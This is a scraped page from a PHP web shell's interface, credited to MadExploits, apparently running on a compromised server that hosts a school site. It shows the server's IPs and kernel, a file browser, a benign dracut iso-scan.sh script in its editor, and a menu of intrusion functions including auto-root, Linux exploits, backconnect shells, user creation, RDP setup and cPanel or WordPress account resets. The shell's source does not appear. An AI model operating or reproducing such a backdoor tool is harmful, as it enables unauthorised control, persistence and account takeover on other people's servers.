Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.22.68.29
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
dracut /
modules.d /
90dmsquash-live /
[ HOME SHELL ]
Name
Size
Permission
Action
apply-live-updates.sh
492
B
-rwxr-xr-x
checkisomd5@.service
268
B
-rw-r--r--
dmsquash-live-genrules.sh
718
B
-rwxr-xr-x
dmsquash-live-root.sh
10.23
KB
-rwxr-xr-x
dmsquash-liveiso-genrules.sh
398
B
-rwxr-xr-x
iso-scan.sh
901
B
-rwxr-xr-x
module-setup.sh
1.17
KB
-rwxr-xr-x
parse-dmsquash-live.sh
1.65
KB
-rwxr-xr-x
parse-iso-scan.sh
309
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iso-scan.sh
#!/bin/sh # -*- mode: shell-script; indent-tabs-mode: nil; sh-basic-offset: 4; -*- # ex: ts=8 sw=4 sts=4 et filetype=sh type getarg >/dev/null 2>&1 || . /lib/dracut-lib.sh PATH=/usr/sbin:/usr/bin:/sbin:/bin isofile=$1 [ -z "$isofile" ] && exit 1 ismounted "/run/initramfs/isoscan" && exit 0 mkdir -p "/run/initramfs/isoscan" do_iso_scan() { local _name local dev for dev in /dev/disk/by-uuid/*; do _name=$(dev_unit_name "$dev") [ -e /tmp/isoscan-${_name} ] && continue > /tmp/isoscan-${_name} mount -t auto -o ro "$dev" "/run/initramfs/isoscan" || continue if [ -f "/run/initramfs/isoscan/$isofile" ]; then losetup -f "/run/initramfs/isoscan/$isofile" rm -f -- "$job" exit 0 else umount "/run/initramfs/isoscan" fi done } do_iso_scan rmdir "/run/initramfs/isoscan" exit 1
Close